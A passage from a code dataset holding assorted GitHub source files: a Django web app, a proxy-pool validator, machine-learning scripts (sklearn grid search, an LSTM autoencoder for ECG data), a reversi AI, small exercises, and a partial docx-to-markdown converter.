socket.SOCK_STREAM)\n if DEBUG:\n print(config_var['DOMAIN'])\n if DEBUG:\n print(config_var['PORT'])\n server.connect((config_var['DOMAIN'], int(config_var['PORT'])))\n server.send(bytedata)\n rcv = server.recv(1024)\n server.close()\n if int(rcv) == row[0]:\n DB = KWH_MySQL.KWH_MySQL()\n sql = \"DELETE FROM kwh.tx_string WHERE timestamp = \" + str(row[0])\n result = DB.INSERT(sql)\n","repo_name":"KWH-DAS-TEAM/Datalogger","sub_path":"transceive/tcp/transmit.py","file_name":"transmit.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"1466795600","text":"from django.shortcuts import render\nfrom mainapp.models import Collections, CollectionsImg\nfrom mainapp.views import wallpaper_collections\n\n\n\ndef ajax_test(request, collection_name):\n title = 'test'\n current_wallpaper_img = CollectionsImg.objects.filter(img_collection__collection_name=collection_name)\n current_collection = Collections.objects.get(collection_name=collection_name)\n context = {'title': title,\n 'current_collection': current_collection,\n 'current_wallpaper_img': current_wallpaper_img,\n 'collections': wallpaper_collections}\n return render(request, 'testapp/test1.html', context)\n","repo_name":"mikibouns/DJANGO_PROJ","sub_path":"djangoproject/mysite/testapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36775485252","text":"import requests\nimport MySQLdb\nimport time\ndef get_data():\n dbs =MySQLdb.connect(host=\"0.0.0.0\", user=\"user\", 
passwd=\"wydiisasdsd##&user\", db=\"AddressPool\", charset=\"utf8\")\n cursor=dbs.cursor()\n cursor.execute(\"SELECT * FROM address_table1 where type='https'\")\n AddressPool=cursor.fetchall()\n print(\"总共搜索到\" + str(len(AddressPool)) + \"条https类型的代理\")\n for data in AddressPool:\n verification(data,dbs=dbs)\n dbs.close()\ndef verification(data,dbs):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36'\n }\n proxies={\n \"http\":\"http://%s:%s\"%(data[1],data[3]),\n }\n url =\"https://www.baidu.com/\"#https://19ncc.medmeeting.org/cn\n if data[2]==\"https\":\n proxies={\n \"https\": \"https://%s:%s\" % (data[1], data[3])\n }\n url=\"https://www.baidu.com/\"\n start=(int)(time.time()*1000)\n try:\n response=requests.get(url=url,headers=headers,proxies=proxies,timeout=5)\n code=response.status_code\n except:\n print(\"代理失效\")\n return\n stop=(int)(time.time()*1000)\n if code==200:\n speed=str(stop-start)\n times=str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(start/1000)))\n sql='''UPDATE address_table1 SET speed=%s,times=\"%s\" WHERE id=%s'''%(speed,times,str(data[0]))\n dbs.cursor().execute(sql)\n sql='''INSERT INTO address_table2(address,type,port,isAnonymity,Location,times,speed) VALUES(\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",%s)'''%(data[1],data[2],data[3],data[4],data[5],times,speed)\n dbs.cursor().execute(sql)\n dbs.commit()\n print(\"IP:\"+data[1]+\" \\t\"+\"time:\"+speed+\"ms\")\ndef delect_data():\n dbs = MySQLdb.connect(host=\"0.0.0.0\", user=\"user\", passwd=\"wydiisasdsd##&user\", db=\"AddressPool\", charset=\"utf8\")\n dbs.cursor().execute(\"TRUNCATE TABLE address_table2\")\n dbs.commit()\n dbs.close()\nif __name__ == '__main__':\n delect_data()\n get_data()\n","repo_name":"Deng872347348/study-learn","sub_path":"crawler-2/spider-crawl-school/线程爬取/ip-proxy-pool/AddressPool/spider/UpdatePool.py","file_name":"UpdatePool.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"25866636786","text":"from sklearn import datasets, neighbors, metrics, mixture, svm\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#keep track of accuracy and best parameter\nbestParam = \"\"\nmodelAccuracy = \"\"\ndef loadDS(name):\n # we have 3 values here iris, breast-cancer, wine\n # no else block required cause we use radio button and each RB has associated value\n if name == \"iris\":\n return datasets.load_iris()\n if name == \"breast-cancer\":\n return datasets.load_breast_cancer()\n if name == \"wine\":\n return datasets.load_wine()\n\ndef classification(name, alg, fold, checkMessage):\n global bestParam, modelAccuracy\n #loading selected dataset\n df = loadDS(name)\n\n # target and training data\n X = df.data\n y = df.target\n class_names = df.target_names\n\n # train test split\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\n # will check for knn and svm algorithms\n if alg == \"knn\":\n classAlg = neighbors.KNeighborsClassifier()\n param = [{\"n_neighbors\" : range(1, 50)}]\n xLabel = \"KNN\"\n elif alg == \"svm\":\n classAlg = svm.SVC()\n param = [{\"gamma\" : [0.0001, 0.001, 0.01, 0.1, 1]}]\n xLabel = \"SVC\"\n\n # creating a gridsearchcv object and passing classification alg, fold value and parameter\n gscv_classifier = GridSearchCV(\n estimator= classAlg,\n param_grid= 
param,\n cv = fold,\n scoring= \"accuracy\"\n )\n\n #using the gscv classifier to train the training data\n gscv_classifier.fit(X_train, y_train)\n\n #taking from tutorial\n print(\"Grid scores on validation set\")\n print()\n means = gscv_classifier.cv_results_[\"mean_test_score\"]\n stds = gscv_classifier.cv_results_[\"std_test_score\"]\n results = gscv_classifier.cv_results_[\"params\"]\n\n for mean, std, param in zip(means, stds, results):\n print(\"Parameter: %r, accuracy: %0.3f (+/-%0.03f)\" % (param, mean,\n std * 2))\n print()\n print(\"Best parameter: \", gscv_classifier.best_params_)\n bestParam += str(gscv_classifier.best_params_)\n checkMessage.insert(\"end\", f\"Best parameter : {bestParam}\\n\")\n\n\n #using trhe gscv classfier on test dataset\n y_pred = gscv_classifier.predict(X_test)\n\n # collecting all the dictionary values to xVal\n #plot againg means\n xVal = []\n for i in results:\n xVal.append(list(i.values())[0])\n\n #plotting confusion matrix and accuracy\n accuracy = metrics.accuracy_score(y_test, y_pred) * 100\n # modelAccuracy = str(accuracy)\n # checkMessage.insert(\"end\", f\"Accuracy : {modelAccuracy}\")\n plotcm = metrics.plot_confusion_matrix(gscv_classifier, X_test, y_test, display_labels = class_names)\n plotcm.ax_.set_title(\"Accuracy = {0:.2f}%\".format(accuracy))\n plt.show()\n\n # x_axis = list(results[0:len(results)].values())\n x_axis = xVal\n y_axis = means\n plot_axes = plt.axes()\n plt.xlabel(xLabel)\n plt.ylabel('CV score')\n plot_axes.plot(x_axis, y_axis)\n plt.show()","repo_name":"Adnan525/dataClassificationGUI","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15008540735","text":"\"\"\"geotravel URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.contrib import admin\nfrom django.urls import path, include, resolve, reverse\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom froala_editor import views\n\n\nurlpatterns = [\n path('geomin/', admin.site.urls),\n path('froala_editor/', include('froala_editor.urls')),\n url(r'^i18n/', include('django.conf.urls.i18n')),\n]\n\nurlpatterns += i18n_patterns(\n path(\"\", include(\"geotravel_app.urls\")),\n path(\"tours/\", include(\"tours.urls\")),\n path(\"guides/\", include(\"guides.urls\")),\n path('transport/', include('transport.urls')),\n prefix_default_language=False,\n)\n\nurlpatterns += [\n path('geotranslate/', include('rosetta.urls')),\n]\n\nhandler404 = 'geotravel_app.views.error_404'\n\n# not for production\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"KamilRAliyev/geo-travel-source","sub_path":"geotravel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"74489809007","text":"from utils.dataset import ECG5000\nfrom models.RecurrentAutoencoder import RecurrentAutoencoder\nimport torch\nimport torch.nn as nn\nimport copy\nfrom tqdm import tqdm\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\n\n# https://curiousily.com/posts/time-series-anomaly-detection-using-lstm-autoencoder-with-pytorch-in-python/\n\nif __name__ == '__main__':\n\n dataset_normal = ECG5000(mode='normal')\n dataset_anomaly = ECG5000(mode='anomaly')\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n seq_len, n_features = 140, 1\n batch_size = 512\n\n ################################\n validation_split = test_split = 0.15\n random_seed = 42\n\n # Creating data indices for training and validation splits:\n dataset_size = len(dataset_normal)\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split * dataset_size))\n\n # suffling\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices, test_indices = indices[split:], indices[:split]\n train_indices, val_indices = train_indices[split:], train_indices[:split]\n\n print('train_indices: ', len(train_indices))\n print('val_indices: ', len(val_indices))\n print('test_indices: ', len(test_indices))\n\n # check all splits have no intersections\n assert not [value for value in train_indices if value in test_indices]\n assert not [value for value in train_indices if value in val_indices]\n assert not [value for value in val_indices if value in test_indices]\n ##############################\n\n model = RecurrentAutoencoder(seq_len, n_features=n_features, embedding_dim=128, device=device, batch_size=batch_size)\n\n # Creating PT data samplers and loaders:\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n test_sampler = SubsetRandomSampler(test_indices)\n\n train_loader = torch.utils.data.DataLoader(dataset_normal, batch_size=batch_size, sampler=train_sampler)\n validation_loader = torch.utils.data.DataLoader(dataset_normal, batch_size=batch_size, sampler=valid_sampler)\n test_loader = 
torch.utils.data.DataLoader(dataset_normal, batch_size=batch_size, sampler=test_sampler)\n    anomaly_loader = torch.utils.data.DataLoader(dataset_anomaly, batch_size=batch_size)\n\n\n    # x = dataset.get_torch_tensor()\n    # z = model.encoder(x) # z.shape = [7]\n    # x_prime = model.decoder(z, seq_len=10) # x_prime.shape = [10, 3]\n    #\n    # z = model(x)\n    #\n    # print(x.shape)\n\n    # start training\n    n_epochs = 500\n    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n    criterion = nn.MSELoss(reduction='mean').to(device)  # todo article use L1Loss\n    history = dict(train=[], val=[])\n    best_model_wts = copy.deepcopy(model.state_dict())\n    best_loss = 10000.0\n\n    for epoch in tqdm(range(1, n_epochs + 1)):\n        model = model.train()\n\n        train_losses = []\n        val_losses = []\n        test_losses = []\n        anomaly_losses = []\n\n        for i, seq_true in enumerate(train_loader):\n            optimizer.zero_grad()\n            seq_true = seq_true.to(device)\n            seq_pred = model(seq_true)\n            loss = criterion(seq_pred, seq_true)\n            loss.backward()\n            optimizer.step()\n            train_losses.append(loss.item())\n\n        model = model.eval()\n        with torch.no_grad():\n\n            # validation steps\n            for i, seq_true in enumerate(validation_loader):\n                seq_true = seq_true.to(device)\n                seq_pred = model(seq_true)\n                loss = criterion(seq_pred, seq_true)\n                val_losses.append(loss.item())\n\n            # normal_test steps\n            for i, seq_true in enumerate(test_loader):\n                seq_true = seq_true.to(device)\n                seq_pred = model(seq_true)\n                loss = criterion(seq_pred, seq_true)\n                test_losses.append(loss.item())\n\n            # anomaly_test steps\n            for i, seq_true in enumerate(anomaly_loader):\n                seq_true = seq_true.to(device)\n                seq_pred = model(seq_true)\n                loss = criterion(seq_pred, seq_true)\n                anomaly_losses.append(loss.item())\n\n        train_loss = np.mean(train_losses)\n        val_loss = np.mean(val_losses)\n        test_loss = np.mean(test_losses)\n        anomaly_loss = np.mean(anomaly_losses)\n        history['train'].append(train_loss)\n        history['val'].append(val_loss)\n\n        # keep a copy of the weights from the best validation epoch\n        if val_loss < best_loss:\n            best_loss = val_loss\n            best_model_wts = copy.deepcopy(model.state_dict())\n        print(f'Epoch {epoch}: train loss {train_loss} {\" \"*6} val loss {val_loss} {\" \"*6} test loss {test_loss} {\" \"*6} anomaly loss {anomaly_loss}')\n\n    model.load_state_dict(best_model_wts)","repo_name":"fabiozappo/LSTM-Autoencoder-Time-Series","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"}
{"seq_id":"73181342447","text":"from node import Node\nimport reversiutils as ru\nimport time\n\n\nclass MyPlayer(object):\n    \"\"\"\n    Uses MiniMax with alpha-beta pruning for the first 0.5 sec, heuristic evaluation afterwards\n    \"\"\"\n\n    MAX_WAITING_TIME = 0.5\n    # weights for heuristic evaluation\n    SQUARE_WEIGHTS = [\n        200, -100, 100, 50, 50, 100, -100, 200,\n        -100, -200, -50, -50, -50, -50, -200, -100,\n        100, -50, 100, 0, 0, 100, -50, 100,\n        50, -50, 0, 0, 0, 0, -50, 50,\n        50, -50, 0, 0, 0, 0, -50, 50,\n        100, -50, 100, 0, 0, 100, -50, 100,\n        -100, -200, -50, -50, -50, -50, -200, -100,\n        200, -100, 100, 50, 50, 100, -100, 200,\n    ]\n\n    def __init__(self, my_color, opponent_color):\n        self.name = 'izotomas'\n        self.my_color = my_color\n        self.opponent_color = opponent_color\n        self.start_time = 0\n\n    def move(self, board):\n        board1d = ru.flatten(board)\n        root = Node(board1d, self.my_color, self.opponent_color)\n        self.start_time = time.time()\n        root.children = root.get_children()\n        if not root.children:\n            return None\n        best_move = self.__alpha_beta_search(root)\n        return best_move\n\n    # region Helpers\n\n    def __alpha_beta_search(self, node):\n        self.__max_value(node, Node.DEFAULT_SCORE, 
Node.DEFAULT_SCORE * (-1))\n best_node = max(node.children)\n coordinates = ru.index_to_cartesian(best_node.move)\n return coordinates\n\n def __max_value(self, node, alpha, beta):\n node.children = node.get_children()\n if self.__is_terminal_state(node):\n return self.__evaluate(node)\n for child in node.children:\n node.score = max(node.score, self.__min_value(child, alpha, beta))\n if node.score >= beta:\n return node.score\n alpha = max(alpha, node.score)\n return node.score\n\n def __min_value(self, node, alpha, beta):\n node.children = node.get_children()\n if self.__is_terminal_state(node):\n return self.__evaluate(node)\n for child in node.children:\n node.score = min(node.score, self.__max_value(child, alpha, beta))\n if node.score <= alpha:\n return node.score\n beta = min(beta, node.score)\n return node.score\n\n def __is_terminal_state(self, node):\n move_time = (time.time() - self.start_time)\n time_expired = move_time > MyPlayer.MAX_WAITING_TIME\n no_children = not node.children\n return time_expired or no_children\n\n @staticmethod\n def __evaluate(node):\n free_position_count = node.board.count(-1)\n if not node.children or free_position_count == 0:\n return ru.utility(node) * 10000\n\n if free_position_count > 45:\n return ru.mobility(node) + \\\n 4 * ru.positional_strength(node, MyPlayer.SQUARE_WEIGHTS) + \\\n 100 * ru.corners(node)\n\n if free_position_count > 30:\n return 10 * ru.parity(node) + \\\n 5 * ru.mobility(node) + \\\n 10 * ru.positional_strength(node, MyPlayer.SQUARE_WEIGHTS) + \\\n 100 * ru.corners(node)\n\n else:\n return 500 * ru.parity(node) + \\\n 1000 * ru.positional_strength(node, MyPlayer.SQUARE_WEIGHTS) + \\\n 1000 * ru.corners(node)\n\n # endregion\n","repo_name":"izotomas/CVUT---Cybernetics-and-AI","sub_path":"labs/reversi/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8959023858","text":"from typing import Dict, Text, Union\n\nimport attr\n\nfrom digicubes_flask import CurrentUser, current_user, digicubes\nfrom digicubes_flask.client.model import RoleModel, SchoolModel, UserModel\nfrom digicubes_flask.web.account_manager import DigicubesAccountManager\n\nserver: DigicubesAccountManager = digicubes\nuser: CurrentUser = current_user\n\nValueType = Union[str, float, int, bool]\nDataType = Dict[Text, ValueType]\n\n\n@attr.s(auto_attribs=True)\nclass RfcRequest:\n # pylint: disable=C0111\n function_name: Text\n data: DataType = {}\n\n\n@attr.s(auto_attribs=True)\nclass RfcResponse:\n # pylint: disable=C0111\n status: int = 200\n text: Text = \"ok\"\n data: DataType = {}\n\n\nclass RfcError(Exception):\n pass\n\n\nclass AdminRFC:\n\n STATUS_OK = 200\n\n @staticmethod\n def rfc_user_set_active_state(data: DataType) -> RfcResponse:\n user_id = data.get(\"user_id\", None)\n mode = data.get(\"mode\", \"toggle\")\n\n user = server.user.get(server.token, user_id, fields=[\"is_active\"])\n new_state = user.is_active\n\n if mode == \"toggle\":\n new_state = not new_state\n elif mode == \"on\":\n new_state = True\n elif mode == \"off\":\n new_state = False\n else:\n raise ValueError(\"Unknown mode\")\n\n if new_state != user.is_active:\n server.user.update(server.token, UserModel(id=user_id, is_active=new_state))\n\n return RfcResponse(data={\"user_id\": user_id, \"state\": new_state})\n\n @staticmethod\n def rfc_user_toggle_role(data: DataType) -> RfcResponse:\n user_id = data.get(\"user_id\", None)\n role_id = 
data.get(\"role_id\", None)\n operation = data.get(\"operation\", \"toggle\")\n\n assert user_id is not None, \"No user id provided\"\n assert role_id is not None, \"No role id provided\"\n\n if operation == \"add\":\n server.user.add_role(\n server.token, UserModel(id=user_id), RoleModel(id=role_id, name=\"xxx\")\n )\n return RfcResponse(data={\"user_id\": user_id, \"role_id\": role_id, \"has_role\": True})\n\n if operation == \"remove\":\n server.user.remove_role(\n server.token, UserModel(id=user_id), RoleModel(id=role_id, name=\"xxx\")\n )\n return RfcResponse(data={\"user_id\": user_id, \"role_id\": role_id, \"has_role\": False})\n\n raise ValueError(f\"Unknown or unsupported operation '{operation}'\")\n\n @staticmethod\n def rfc_school_get_course_info(data: DataType) -> RfcResponse:\n school_id = data.get(\"school_id\", None)\n assert school_id is not None, \"No school id provided\"\n courses = server.school.get_courses(server.token, SchoolModel(id=school_id))\n # TODO: An dieser stelle brauche ich nicht alle Felder der\n # Kurse. Aber die Methode get_courses unterstützt das\n\n private_courses = list([c.id for c in courses if c.is_private])\n return RfcResponse(\n data={\"count_courses\": len(courses), \"count_private_courses\": len(private_courses)}\n )\n\n @staticmethod\n def rfc_user_set_verified_state(data: DataType) -> RfcResponse:\n user_id = data.get(\"user_id\", None)\n assert user_id is not None, \"No user id provided\"\n\n mode = data.get(\"mode\", \"toggle\")\n\n user = server.user.get(server.token, user_id, fields=[\"is_verified\"])\n new_state = user.is_verified\n\n if mode == \"toggle\":\n new_state = not new_state\n elif mode == \"on\":\n new_state = True\n elif mode == \"off\":\n new_state = False\n else:\n raise ValueError(\"Unknown mode\")\n\n if new_state != user.is_verified:\n u = UserModel(id=user_id, is_verified=new_state)\n u = server.user.update(server.token, u)\n\n return RfcResponse(data={\"user_id\": user_id, \"state\": new_state})\n\n @staticmethod\n def no_such_function(request: RfcRequest) -> RfcResponse:\n\n return RfcResponse(status=404, text=\"No such function\")\n\n @staticmethod\n def no_function(request: RfcRequest) -> RfcResponse:\n\n return RfcResponse(status=400, text=\"Bad request. 
No function name provided.\")\n\n @staticmethod\n def call(request: RfcRequest) -> RfcResponse:\n if request.function_name is None:\n return AdminRFC.no_such_function(request)\n\n method = getattr(AdminRFC, f\"rfc_{request.function_name.lower()}\", None)\n if method is None:\n return AdminRFC.no_such_function(request)\n\n if not callable(method):\n return AdminRFC.no_such_function(request)\n\n return method(request.data)\n","repo_name":"FirstKlaas/digicubes-flask","sub_path":"digicubes_flask/web/modules/admin/rfc.py","file_name":"rfc.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21003861921","text":"num_tests = int(input())\n\nfor x in range(num_tests):\n str_length = int(input())\n given_str = input()\n counter = 0\n for x in given_str:\n if x == 'a' or x == 'e' or x == 'i' or x == 'o' or x == 'u':\n counter = 0\n #print(counter)\n else:\n counter = counter + 1\n #print(counter)\n if counter >= 4:\n break;\n if counter >= 4:\n print(\"NO\")\n else: \n print(\"YES\")","repo_name":"vjks/python-programs","sub_path":"CodeChef/easy_pronunciation.py","file_name":"easy_pronunciation.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73152658285","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\n# Create your models here.\nESTADO_CHOICES = [\n ('OLD', 'Usado'),\n ('NEW', 'Nuevo'),\n ]\nTIPO_CHOICES = [\n ('AU', 'Auto'),\n ('MO', 'Moto'),\n ('CA', 'Camion'),\n ]\nCAMBIOS_CHOICES = [\n ('AU', 'Automatico'),\n ('MA', 'Manual'),\n ]\nCOMBUSTIBLE_CHOICES = [\n ('AU', 'Auto'),\n ('MO', 'Moto'),\n ('CA', 'Camion'),\n ]\nPUERTAS_CHOICES = [\n ('3', 'Tres Puertas'),\n ('5', 'Cinco Puertas'),\n ]\nASIENTOS_CHOICES = [\n ('2', 'Dos Asientos'),\n ('5', 'Cinco Asientos'),\n ]\nclass Vehiculo(models.Model):\n nombre = models.CharField(max_length=50)\n fotoPortada = models.ImageField(max_length=100, upload_to='portadas/', blank=True)\n modelo = models.CharField(max_length=50)\n version = models.CharField(max_length=50)\n año = models.IntegerField(validators=[MinValueValidator(1900), MaxValueValidator(3000)])\n estado = models.CharField(\n max_length=3,\n choices=ESTADO_CHOICES,\n )\n\n def __str__(self):\n return self.nombre","repo_name":"cettipao/ariesautomotores","sub_path":"aries/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"19470284855","text":"import math\n\nfor _ in range(int(input())):\n num = int(input())\n s = num * (num + 1) // 2\n if s % 2 == 0:\n temp = int((math.sqrt(4 + 8 * (num * num + num)) - 2) // 4)\n res = num - temp\n if temp * (temp + 1) // 2 == s // 2:\n res += (temp * (temp - 1) // 2) + ((num - temp) * ((num - temp) - 1) // 2)\n print(res)\n else:\n print(0)","repo_name":"ShivArora-Sykkuno/Collage-Assignments","sub_path":"CHFNSWAP.py","file_name":"CHFNSWAP.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21709352256","text":"raw_text = str(input(\"Key in something you want to encrpyt please!\"))\r\ndecoded = \"\"\r\n\r\nfinal = []\r\nfinal_1 = []\r\n\r\nfor i in raw_text:\r\n conversion_1 = i\r\n conversion_2 = ord(conversion_1)\r\n conversion_2 = (conversion_2 * 7) + 23\r\n 
final.append(conversion_2)\r\n\r\nprint(final)\r\n\r\nfor ii in final:\r\n    conversion_3 = ii\r\n    conversion_4 = (conversion_3 - 23) / 7\r\n    final_1.append(conversion_4)\r\n\r\nprint(final_1)\r\n\r\nfor i in final_1:\r\n    decoded += chr(int(i))\r\n\r\nprint(decoded)\r\n\r\n","repo_name":"YEOWEIHNGWHYELAB/Lousy-Encryption","sub_path":"Basic_Encryption.py","file_name":"Basic_Encryption.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"26234303297","text":"import re\r\nimport io\r\nimport os.path\r\nimport collections\r\n\r\n\r\nfrom lxml import etree\r\n\r\nfrom . import utils\r\n\r\n\r\nclass Converter:\r\n    def __init__(self, xml_text, media, use_md_table):\r\n        self.tree = etree.fromstring(xml_text)\r\n        utils.strip_ns_prefix(self.tree)\r\n        self.media = media\r\n        self.image_counter = self.counter()\r\n        self.table_counter = self.counter()\r\n        self.use_md_table = use_md_table\r\n\r\n    def counter(self, start=1):\r\n        count = start - 1\r\n\r\n        def inc():\r\n            nonlocal count\r\n            count += 1\r\n            return count\r\n\r\n        return inc\r\n\r\n    def convert(self):\r\n        self.in_list = False\r\n\r\n        of = io.StringIO()\r\n        body = self.get_first_element(self.tree, \"//body\")\r\n        self.parse_node(of, body)\r\n\r\n        return re.sub(r\"\\n{2,}\", \"\\n\\n\", of.getvalue()).strip()\r\n\r\n    def get_first_element(self, node, xpath):\r\n        tags = node.xpath(xpath)\r\n        return tags[0] if len(tags) > 0 else None\r\n\r\n    def get_sub_text(self, node):\r\n        of = io.StringIO()\r\n        self.parse_node(of, node)\r\n        return of.getvalue().strip()\r\n\r\n    def parse_node(self, of, node):\r\n        if node is None:\r\n            return\r\n\r\n        for child in node.getchildren():\r\n            tag_name = child.tag\r\n            if tag_name == \"sdt\":  # skip Table of Contents\r\n                continue\r\n            elif tag_name == \"p\":\r\n                self.parse_p(of, child)\r\n            elif tag_name == \"br\":\r\n                if child.attrib.get(\"type\") == \"page\":\r\n                    print('\\n<div style=\"page-break-after: always;\"></div>\\n', file=of)\r\n                else:\r\n                    print(\"<br> \", end=\"\", file=of)\r\n            elif tag_name == \"t\":\r\n                print(child.text or \" \", end=\"\", file=of)\r\n            elif tag_name == \"drawing\":\r\n                self.parse_drawing(of, child)\r\n            elif tag_name == \"tbl\":\r\n                self.parse_tbl(of, child)\r\n            else:\r\n                self.parse_node(of, child)\r\n\r\n    def parse_tbl(self, of, node):\r\n        properties = self.get_table_properties(node)\r\n        if self.use_md_table:\r\n            self.emit_md_table(of, node, len(properties[0]))\r\n        else:\r\n            self.emit_html_table(of, node, properties)\r\n\r\n    def emit_md_table(self, of, node, col_size):\r\n        print(\"\", file=of)\r\n        print(\"| # \" * (col_size) + \"|\", file=of)\r\n        print(\"|---\" * col_size + \"|\", file=of)\r\n        for tag_tr in node.xpath(\".//tr\"):\r\n            print(\"|\", end=\"\", file=of)\r\n            for tag_tc in tag_tr.xpath(\".//tc\"):\r\n                span = 1\r\n                gridSpan = self.get_first_element(tag_tc, \".//gridSpan\")\r\n                if gridSpan is not None:\r\n                    span = int(gridSpan.attrib[\"val\"])\r\n                sub_text = self.get_sub_text(tag_tc)\r\n                text = re.sub(r\"\\n+\", \"<br> \", sub_text)\r\n                print(text, end=\"\", file=of)\r\n                print(\"|\" * span, end=\"\", file=of)\r\n            gridAfter = self.get_first_element(tag_tr, \".//gridAfter\")\r\n            if gridAfter is not None:\r\n                val = int(gridAfter.attrib[\"val\"])\r\n                print(\"|\" * val, end=\"\", file=of)\r\n            print(\"\", file=of)\r\n        print(\"\", file=of)\r\n\r\n    def emit_html_table(self, of, node, properties):\r\n        id = f\"table{self.table_counter()}\"\r\n        print(f'<a id=\"{id}\"></a>\\n<table>', file=of)\r\n        for y, tr in enumerate(node.xpath(\".//tr\")):\r\n            print(\"<tr>\", file=of)\r\n            x = 0\r\n            for tc in tr.xpath(\".//tc\"):\r\n                prop = properties[y][x]\r\n                colspan = prop.span\r\n                attr = \"\" if colspan <= 1 else f' colspan=\"{colspan}\"'\r\n                rowspan = prop.merge_count\r\n                attr += \"\" if rowspan == 0 else f' rowspan=\"{rowspan}\"'\r\n\r\n                sub_text = self.get_sub_text(tc)\r\n                text = re.sub(r\"\\n+\", \"<br> \", sub_text)\r\n                if not prop.merged or prop.merge_count != 0:\r\n                    print(f\"<td{attr}>{text}</td>\", file=of)\r\n                x += colspan\r\n            gridAfter = self.get_first_element(tr, \".//gridAfter\")\r\n            if gridAfter is not None:\r\n                val = int(gridAfter.attrib[\"val\"])\r\n                for _ in range(val):\r\n                    print(\"<td></td>\", file=of)\r\n            print(\"</tr>\", file=of)\r\n        print(\"</table> \", file=of)\r\n\r\n    def get_table_properties(self, node):\r\n        CellProperty = collections.namedtuple(\r\n            \"CellProperty\", [\"span\", \"merged\", \"merge_count\"]\r\n        )\r\n        properties = []\r\n        for tr in node.xpath(\".//tr\"):\r\n            row_properties = []\r\n            for tc in tr.xpath(\".//tc\"):\r\n                span = 1\r\n                gridSpan = self.get_first_element(tc, \".//gridSpan\")\r\n                if gridSpan is not None:\r\n                    span = int(gridSpan.attrib[\"val\"])\r\n                merged = False\r\n                merge_count = 0\r\n                vMerge = self.get_first_element(tc, \".//vMerge\")\r\n                if vMerge is not None:\r\n                    merged = True\r\n                    val = vMerge.attrib.get(\"val\")\r\n                    merge_count = 1 if val == \"restart\" else 0\r\n                prop = CellProperty(span, merged, merge_count)\r\n                row_properties.append(prop)\r\n                for _ in range(span - 1):\r\n                    row_properties.append(\r\n                        CellProperty(0, prop.merged, prop.merge_count)\r\n                    )\r\n            gridAfter = self.get_first_element(tr, \".//gridAfter\")\r\n            if gridAfter is not None:\r\n                val = int(gridAfter.attrib[\"val\"])\r\n                for _ in range(val):\r\n                    row_properties.append(CellProperty(1, False, 0))\r\n            properties.append(row_properties)\r\n\r\n        for y in range(len(properties) - 1):\r\n            for x in range(len(properties[0])):\r\n                prop = properties[y][x]\r\n                if prop.merge_count > 0:\r\n                    count = 0\r\n                    for ynext in range(y + 1, len(properties)):\r\n                        cell = properties[ynext][x]\r\n                        if cell.merged and cell.merge_count == 0:\r\n                            count += 1\r\n                        elif not cell.merged or cell.merge_count > 0:\r\n                            break\r\n                    properties[y][x] = CellProperty(\r\n                        prop.span, prop.merged, prop.merge_count + count\r\n                    )\r\n        return properties\r\n\r\n    def parse_p(self, of, node):\r\n        \"\"\"paragraph, list, heading\"\"\"\r\n        pStyle = 